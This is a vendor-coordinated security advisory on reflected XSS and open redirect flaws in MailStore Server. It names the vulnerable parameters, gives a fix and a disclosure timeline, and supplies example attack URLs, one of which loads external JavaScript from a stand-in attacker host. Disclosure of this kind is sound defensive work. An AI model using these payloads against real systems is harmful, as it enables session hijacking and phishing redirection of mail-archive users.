secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server
Affected Products
MailStore Server Version 10.0.1.12148 was tested
according to the vendor:
- MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability
- Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability
References
https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
CWE-79 https://cwe.mitre.org/data/definitions/79.html
CWE-601 https://cwe.mitre.org/data/definitions/601.html
Summary:
"MailStore Server is one of the worldas leading solutions for email archiving,
management and compliance for small and medium-sized businesses."
The in-built Webapplication does not properly validate untrusted input in
several variables. This leads to both Reflected Cross-Site-Scripting (XSS)
and an Open Redirect.
Effect:
To exploit the reflected XSS, the victim has to be authenticated to the
Mailstore Webapplication. By clicking on a link sent to a victim, an attacker
could for example copy the victims Session-ID to his on data sink.
Sending another link with a crafted URL, the attacker could redirect the
victim to a malicious website, while the link itself points to the trusted
Mailstore-Address. The victim is not required to be authenticated.
Vulnerable Scripts Reflected XSS for authenticated users:
/search-result/, Parameters c-f, c-q, c-from and c-to
/message/ajax/send/, Parameter recipient
Vulnerable Script Open Redirect:
derefer/, Parameter url
Example for reflected XSS:
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
#Load external JS-Code
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E
Example for Open Redirect:
https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de
Solution:
Update to Version 10.0.2
Disclosure Timeline:
2017/01/09 vendor contacted
2017/01/10 initial vendor response asking for technical details
2017/01/10 provided vendor with the advisory including technical details
2017/01/13 vendor provided informations about affected versions and mitigation
2017/01/18 update published by vendor
2017/01/31 public disclosure
Credits:
Tobias Glemser
tglemser@secuvera.de
secuvera GmbH
https://www.secuvera.de
Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.